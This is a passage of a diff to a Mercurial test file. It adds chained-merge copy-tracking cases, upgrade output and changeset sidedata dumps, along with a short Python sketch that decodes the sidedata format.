+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
+ (branch merge, don't forget to commit)
+ $ echo jj > unrelated-j
+ $ hg ci -m "mJ,EAm: $case_desc"
created new head
- $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))'
- @ 36 mHC-delete-before-conflict-m-0
+
+
+ $ hg log -G --rev '::(desc("mAE,Km") + desc("mK,AEm") + desc("mEA,Jm") + desc("mJ,EAm"))'
+ @ mJ,EAm: chained merges (conflict -> simple) - same content everywhere
|\
- +---o 35 mCH-delete-before-conflict-m-0
+ +---o mEA,Jm: chained merges (conflict -> simple) - same content everywhere
| |/
- | o 34 h-1: b -(move)-> d
+ | | o mK,AEm: chained merges (conflict -> simple) - same content everywhere
+ | | |\
+ | | +---o mAE,Km: chained merges (conflict -> simple) - same content everywhere
+ | | | |/
+ | | | o k-1: unrelated changes (based on "e" changes)
+ | | | |
+ | o | | j-1: unrelated changes (based on the "a" series of changes)
+ | | | |
+ o-----+ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way
+ |/ / /
+ | o / mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way
+ |/|/
+ | o e-2 g -move-> f
+ | |
+ | o e-1 b -move-> g
+ | |
+ o | a-2: e -move-> f
+ | |
+ o | a-1: d -move-> e
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: chaining conflicting rename resolution, with actual merging happening
+``````````````````````````````````````````````````````````````````````````````
+
+The "mPQm" and "mQPm" case create a rename tracking conflict on file 't'. We
+add more change on the respective branch and merge again. These second merge
+does not involve the file 't' and the arbitration done within "mPQm" and "mQP"
+about that file should stay unchanged.
+
+ $ case_desc="chained merges (conflict -> simple) - different content"
+
+(extra unrelated changes)
+
+ $ hg up 'desc("p-2")'
+ 3 files updated, 0 files merged, 3 files removed, 0 files unresolved
+ $ echo s > unrelated-s
+ $ hg add unrelated-s
+ $ hg ci -m 's-1: unrelated changes (based on the "p" series of changes)'
+ created new head
+
+ $ hg up 'desc("q-2")'
+ 2 files updated, 0 files merged, 2 files removed, 0 files unresolved
+ $ echo t > unrelated-t
+ $ hg add unrelated-t
+ $ hg ci -m 't-1: unrelated changes (based on "q" changes)'
+ created new head
+
+(merge variant 1)
+
+ $ hg up 'desc("mPQm")'
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved
+ $ hg merge 'desc("t-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mPQ,Tm: $case_desc"
+
+(merge variant 2)
+
+ $ hg up 'desc("t-1")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+ $ hg merge 'desc("mPQm")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mT,PQm: $case_desc"
+ created new head
+
+(merge variant 3)
+
+ $ hg up 'desc("mQPm")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("s-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mQP,Sm: $case_desc"
+
+(merge variant 4)
+
+ $ hg up 'desc("s-1")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("mQPm")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mS,QPm: $case_desc"
+ created new head
+ $ hg up null --quiet
+
+
+ $ hg log -G --rev '::(desc("mPQ,Tm") + desc("mT,PQm") + desc("mQP,Sm") + desc("mS,QPm"))'
+ o mS,QPm: chained merges (conflict -> simple) - different content
+ |\
+ +---o mQP,Sm: chained merges (conflict -> simple) - different content
+ | |/
+ | | o mT,PQm: chained merges (conflict -> simple) - different content
+ | | |\
+ | | +---o mPQ,Tm: chained merges (conflict -> simple) - different content
+ | | | |/
+ | | | o t-1: unrelated changes (based on "q" changes)
+ | | | |
+ | o | | s-1: unrelated changes (based on the "p" series of changes)
+ | | | |
+ o-----+ mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way
+ |/ / /
+ | o / mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way
+ |/|/
+ | o q-2 w -move-> v
+ | |
+ | o q-1 r -move-> w
+ | |
+ o | p-2: u -move-> v
| |
- o | 6 c-1 delete d
- | |
- o | 2 i-2: c -move-> d
+ o | p-1: t -move-> u
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: chaining salvage information during a merge
+````````````````````````````````````````````````````
+
+We add more changes on the branch where the file was deleted. Merging again
+should preserve the fact that the file was salvaged.
+
+ $ case_desc="chained merges (salvaged -> simple) - same content (when the file exists)"
+
+(creating the change)
+
+ $ hg up 'desc("c-1")'
+ 5 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ echo l > unrelated-l
+ $ hg add unrelated-l
+ $ hg ci -m 'l-1: unrelated changes (based on "c" changes)'
+ created new head
+
+(Merge variant 1)
+
+ $ hg up 'desc("mBC-revert-m")'
+ 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("l-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mBC+revert,Lm: $case_desc"
+
+(Merge variant 2)
+
+ $ hg up 'desc("mCB-revert-m")'
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("l-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mCB+revert,Lm: $case_desc"
+
+(Merge variant 3)
+
+ $ hg up 'desc("l-1")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+
+ $ hg merge 'desc("mBC-revert-m")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mL,BC+revertm: $case_desc"
+ created new head
+
+(Merge variant 4)
+
+ $ hg up 'desc("l-1")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+
+ $ hg merge 'desc("mCB-revert-m")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mL,CB+revertm: $case_desc"
+ created new head
+
+ $ hg log -G --rev '::(desc("mBC+revert,Lm") + desc("mCB+revert,Lm") + desc("mL,BC+revertm") + desc("mL,CB+revertm"))'
+ @ mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists)
+ |\
+ | | o mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists)
+ | |/|
+ +-+---o mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists)
+ | | |
+ | +---o mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists)
+ | | |/
+ | o | l-1: unrelated changes (based on "c" changes)
+ | | |
+ | | o mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
+ | |/|
+ o---+ mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
+ |/ /
+ o | c-1 delete d
| |
- o | 1 i-1: a -move-> c
+ | o b-1: b update
|/
- o 0 i-0 initial commit: a b h
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+Subcase: chaining "merged" information during a merge
+``````````````````````````````````````````````````````
+
+When a non-rename change are merged with a copy overwrite, the merge pick the copy source from (p1) as the reference. We should preserve this information in subsequent merges.
+
+ $ case_desc="chained merges (copy-overwrite -> simple) - same content"
+
+(extra unrelated changes)
+
+ $ hg up 'desc("f-2")'
+ 2 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !)
+ $ echo n > unrelated-n
+ $ hg add unrelated-n
+ $ hg ci -m 'n-1: unrelated changes (based on the "f" series of changes)'
+ created new head
+
+ $ hg up 'desc("g-1")'
+ 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo o > unrelated-o
+ $ hg add unrelated-o
+ $ hg ci -m 'o-1: unrelated changes (based on "g" changes)'
+ created new head
+
+(merge variant 1)
+
+ $ hg up 'desc("mFGm")'
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !)
+ $ hg merge 'desc("o-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mFG,Om: $case_desc"
+
+(merge variant 2)
+
+ $ hg up 'desc("o-1")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
+ $ hg merge 'desc("FGm")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mO,FGm: $case_desc"
+ created new head
+
+(merge variant 3)
+
+ $ hg up 'desc("mGFm")'
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("n-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mGF,Nm: $case_desc"
+
+(merge variant 4)
+
+ $ hg up 'desc("n-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("mGFm")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mN,GFm: $case_desc"
+ created new head
+
+ $ hg log -G --rev '::(desc("mFG,Om") + desc("mO,FGm") + desc("mGF,Nm") + desc("mN,GFm"))'
+ @ mN,GFm: chained merges (copy-overwrite -> simple) - same content
+ |\
+ +---o mGF,Nm: chained merges (copy-overwrite -> simple) - same content
+ | |/
+ | | o mO,FGm: chained merges (copy-overwrite -> simple) - same content
+ | | |\
+ | | +---o mFG,Om: chained merges (copy-overwrite -> simple) - same content
+ | | | |/
+ | | | o o-1: unrelated changes (based on "g" changes)
+ | | | |
+ | o | | n-1: unrelated changes (based on the "f" series of changes)
+ | | | |
+ o-----+ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way
+ |/ / /
+ | o / mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way
+ |/|/
+ | o g-1: update d
+ | |
+ o | f-2: rename i -> d
+ | |
+ o | f-1: rename h -> i
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: chaining conflicting rename resolution, with an extra change during the merge
+```````````````````````````````````````````````````````````````````````````````````````
+
+The "mEA-change-m-0" and "mAE-change-m-0" case create a rename tracking conflict on file 'f'. We
+add more change on the respective branch and merge again. These second merge
+does not involve the file 'f' and the arbitration done within "mAEm" and "mEA"
+about that file should stay unchanged.
+
+ $ case_desc="chained merges (conflict+change -> simple) - same content on both branch in the initial merge"
+
+
+(merge variant 1)
+
+ $ hg up 'desc("mAE-change-m")'
+ 2 files updated, 0 files merged, 3 files removed, 0 files unresolved
+ $ hg merge 'desc("k-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mAE-change,Km: $case_desc"
+
+(merge variant 2)
+
+ $ hg up 'desc("k-1")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+ $ hg merge 'desc("mAE-change-m")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mK,AE-change-m: $case_desc"
+ created new head
+
+(merge variant 3)
+
+ $ hg up 'desc("mEA-change-m")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("j-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mEA-change,Jm: $case_desc"
+
+(merge variant 4)
+
+ $ hg up 'desc("j-1")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("mEA-change-m")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mJ,EA-change-m: $case_desc"
+ created new head
+
+
+ $ hg log -G --rev '::(desc("mAE-change,Km") + desc("mK,AE-change-m") + desc("mEA-change,Jm") + desc("mJ,EA-change-m"))'
+ @ mJ,EA-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ |\
+ +---o mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ | |/
+ | | o mK,AE-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ | | |\
+ | | +---o mAE-change,Km: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ | | | |/
+ | | | o k-1: unrelated changes (based on "e" changes)
+ | | | |
+ | o | | j-1: unrelated changes (based on the "a" series of changes)
+ | | | |
+ o-----+ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way
+ |/ / /
+ | o / mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way
+ |/|/
+ | o e-2 g -move-> f
+ | |
+ | o e-1 b -move-> g
+ | |
+ o | a-2: e -move-> f
+ | |
+ o | a-1: d -move-> e
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
Summary of all created cases
----------------------------
@@ -650,31 +1537,74 @@
f-2: rename i -> d
g-1: update d
h-1: b -(move)-> d
- i-0 initial commit: a b h
- i-1: a -move-> c
- i-2: c -move-> d
- mABm-0 simple merge - the other way
- mAEm-0 simple merge - one way
- mBAm-0 simple merge - one way
- mBC-revert-m-0
- mBCm-0 simple merge - one way
+ i-0 initial commit: a b h p q r
+ i-1: a -move-> c, p -move-> s
+ i-2: c -move-> d, s -move-> t
+ j-1: unrelated changes (based on the "a" series of changes)
+ k-1: unrelated changes (based on "e" changes)
+ l-1: unrelated changes (based on "c" changes)
+ mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way
+ mAE,Km: chained merges (conflict -> simple) - same content everywhere
+ mAE-change,Km: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way
+ mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way
+ mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way
+ mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists)
+ mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
+ mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
+ mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way
mBCm-1 re-add d
- mBDm-0 simple merge - one way
- mBFm-0 simple merge - one way
- mCB-revert-m-0
- mCBm-0 simple merge - the other way
+ mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way
+ mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
+ mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
+ mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way
+ mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists)
+ mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
+ mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
+ mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way
mCBm-1 re-add d
- mCGm-0
- mCH-delete-before-conflict-m-0
- mDBm-0 simple merge - the other way
- mDGm-0 simple merge - one way
- mEAm-0 simple merge - the other way
- mFBm-0 simple merge - the other way
- mFGm-0 simple merge - one way
- mGCm-0
- mGDm-0 simple merge - the other way
- mGFm-0 simple merge - the other way
- mHC-delete-before-conflict-m-0
+ mCGm-0 merge updated/deleted - revive the file (updated content) - one way
+ mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way
+ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way
+ mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
+ mEA,Jm: chained merges (conflict -> simple) - same content everywhere
+ mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way
+ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way
+ mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
+ mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
+ mFG,Om: chained merges (copy-overwrite -> simple) - same content
+ mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way
+ mGCm-0 merge updated/deleted - revive the file (updated content) - the other way
+ mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way
+ mGF,Nm: chained merges (copy-overwrite -> simple) - same content
+ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way
+ mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way
+ mJ,EA-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ mJ,EAm: chained merges (conflict -> simple) - same content everywhere
+ mK,AE-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ mK,AEm: chained merges (conflict -> simple) - same content everywhere
+ mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists)
+ mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists)
+ mN,GFm: chained merges (copy-overwrite -> simple) - same content
+ mO,FGm: chained merges (copy-overwrite -> simple) - same content
+ mPQ,Tm: chained merges (conflict -> simple) - different content
+ mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way
+ mQP,Sm: chained merges (conflict -> simple) - different content
+ mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way
+ mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way
+ mS,QPm: chained merges (conflict -> simple) - different content
+ mT,PQm: chained merges (conflict -> simple) - different content
+ n-1: unrelated changes (based on the "f" series of changes)
+ o-1: unrelated changes (based on "g" changes)
+ p-1: t -move-> u
+ p-2: u -move-> v
+ q-1 r -move-> w
+ q-2 w -move-> v
+ r-1: rename r -> x
+ r-2: rename t -> x
+ s-1: unrelated changes (based on the "p" series of changes)
+ t-1: unrelated changes (based on "q" changes)
Test that sidedata computations during upgrades are correct
@@ -698,9 +1628,10 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no yes no
+ revlog-v2: no yes no
plain-cl-delta: yes yes yes
compression: * (glob)
compression-level: default default default
@@ -709,7 +1640,48 @@
requirements
preserved: * (glob)
- added: exp-copies-sidedata-changeset, exp-sidedata-flag
+ removed: revlogv1
+ added: exp-copies-sidedata-changeset, exp-revlogv2.2, exp-sidedata-flag
+
+ processed revlogs:
+ - all-filelogs
+ - changelog
+ - manifest
+
+#endif
+
+#if upgraded-parallel
+ $ cat >> $HGRCPATH << EOF
+ > [format]
+ > exp-use-side-data = yes
+ > exp-use-copies-side-data-changeset = yes
+ > [experimental]
+ > worker.repository-upgrade=yes
+ > [worker]
+ > enabled=yes
+ > numcpus=8
+ > EOF
+ $ hg debugformat -v
+ format-variant repo config default
+ fncache: yes yes yes
+ dotencode: yes yes yes
+ generaldelta: yes yes yes
+ share-safe: no no no
+ sparserevlog: yes yes yes
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
+ copies-sdc: no yes no
+ revlog-v2: no yes no
+ plain-cl-delta: yes yes yes
+ compression: * (glob)
+ compression-level: default default default
+ $ hg debugupgraderepo --run --quiet
+ upgrade will perform the following actions:
+
+ requirements
+ preserved: * (glob)
+ removed: revlogv1
+ added: exp-copies-sidedata-changeset, exp-revlogv2.2, exp-sidedata-flag
processed revlogs:
- all-filelogs
@@ -721,194 +1693,411 @@
#if no-compatibility no-filelog no-changeset
+ $ hg debugchangedfiles --compute 0
+ added : a, ;
+ added : b, ;
+ added : h, ;
+ added : p, ;
+ added : q, ;
+ added : r, ;
+
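+The raw sidedata blobs in the listing below can be checked by hand with a
+small decoder. The sketch below is illustrative only: it is not part of the
+test run and it is not Mercurial's actual implementation (the real
+encoder/decoder lives in the mercurial.metadata module); the layout and the
+flag names are inferred from the dumps and the "hg debugchangedfiles" output
+shown below, so treat them as assumptions. The inferred layout is: a
+big-endian u32 file count, then one 9-byte record per file (u8 action flags,
+u32 end offset of the file name, u32 index of the copy source), then the
+concatenated file names.
+
+import struct
+
+# action flag values as observed in the dumps below (assumed, not
+# authoritative)
+FLAGS = {
+    0x04: 'added',
+    0x06: 'added p1',    # added, with a copy source taken from p1
+    0x08: 'merged',
+    0x0c: 'removed',
+    0x10: 'salvaged',
+    0x14: 'touched',
+    0x16: 'touched p1',  # touched, with a copy source taken from p1
+}
+
+def decode_files_sidedata(data):
+    """print one "action  : file, source;" line per file in the blob"""
+    (count,) = struct.unpack_from('>I', data, 0)
+    names = data[4 + 9 * count:]  # the name blob trails the records
+    files = []
+    start = 0
+    for i in range(count):
+        flags, end, src = struct.unpack_from('>BII', data, 4 + 9 * i)
+        files.append((flags, names[start:end], src))
+        start = end
+    for flags, name, src in files:
+        # the source index is only meaningful for the copy-carrying flags
+        source = files[src][1] if flags in (0x06, 0x16) else b''
+        print('%-8s: %s, %s;' % (FLAGS[flags], name.decode(), source.decode()))
+
+# decoding the "i-1" entry reproduces the four lines shown for that
+# revision below: removed a and p, added c (from a) and s (from p)
+decode_files_sidedata(
+    b'\x00\x00\x00\x04'
+    b'\x0c\x00\x00\x00\x01\x00\x00\x00\x00'
+    b'\x06\x00\x00\x00\x02\x00\x00\x00\x00'
+    b'\x0c\x00\x00\x00\x03\x00\x00\x00\x00'
+    b'\x06\x00\x00\x00\x04\x00\x00\x00\x02'
+    b'acps'
+)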
$ for rev in `hg log --rev 'all()' -T '{rev}\n'`; do
- > echo "##### revision $rev #####"
+ > case_id=`hg log -r $rev -T '{word(0, desc, ":")}\n'`
+ > echo "##### revision \"$case_id\" #####"
> hg debugsidedata -c -v -- $rev
> hg debugchangedfiles $rev
> done
- ##### revision 0 #####
+ ##### revision "i-0 initial commit" #####
1 sidedata entries
- entry-0014 size 34
- '\x00\x00\x00\x03\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00abh'
+ entry-0014 size 64
+ '\x00\x00\x00\x06\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x00abhpqr'
added : a, ;
added : b, ;
added : h, ;
- ##### revision 1 #####
+ added : p, ;
+ added : q, ;
+ added : r, ;
+ ##### revision "i-1" #####
1 sidedata entries
- entry-0014 size 24
- '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ac'
+ entry-0014 size 44
+ '\x00\x00\x00\x04\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x02acps'
removed : a, ;
added p1: c, a;
- ##### revision 2 #####
+ removed : p, ;
+ added p1: s, p;
+ ##### revision "i-2" #####
1 sidedata entries
- entry-0014 size 24
- '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00cd'
+ entry-0014 size 44
+ '\x00\x00\x00\x04\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x02cdst'
removed : c, ;
added p1: d, c;
- ##### revision 3 #####
+ removed : s, ;
+ added p1: t, s;
+ ##### revision "a-1" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00de'
removed : d, ;
added p1: e, d;
- ##### revision 4 #####
+ ##### revision "a-2" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ef'
removed : e, ;
added p1: f, e;
- ##### revision 5 #####
+ ##### revision "b-1" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00b'
touched : b, ;
- ##### revision 6 #####
+ ##### revision "c-1 delete d" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x00\x00\x00\x00d'
removed : d, ;
- ##### revision 7 #####
+ ##### revision "d-1 delete d" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x00\x00\x00\x00d'
removed : d, ;
- ##### revision 8 #####
+ ##### revision "d-2 re-add d" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d'
added : d, ;
- ##### revision 9 #####
+ ##### revision "e-1 b -move-> g" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00bg'
removed : b, ;
added p1: g, b;
- ##### revision 10 #####
+ ##### revision "e-2 g -move-> f" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00fg'
added p1: f, g;
removed : g, ;
- ##### revision 11 #####
+ ##### revision "p-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00tu'
+ removed : t, ;
+ added p1: u, t;
+ ##### revision "p-2" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00uv'
+ removed : u, ;
+ added p1: v, u;
+ ##### revision "q-1 r -move-> w" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00rw'
+ removed : r, ;
+ added p1: w, r;
+ ##### revision "q-2 w -move-> v" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00vw'
+ added p1: v, w;
+ removed : w, ;
+ ##### revision "mBAm-0 simple merge - A side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 12 #####
+ ##### revision "mABm-0 simple merge - A side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 13 #####
+ ##### revision "mBCm-0 simple merge - C side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 14 #####
+ ##### revision "mBCm-1 re-add d" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d'
added : d, ;
- ##### revision 15 #####
+ ##### revision "mCBm-0 simple merge - C side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 16 #####
+ ##### revision "mCBm-1 re-add d" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d'
added : d, ;
- ##### revision 17 #####
+ ##### revision "mBDm-0 simple merge - B side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 18 #####
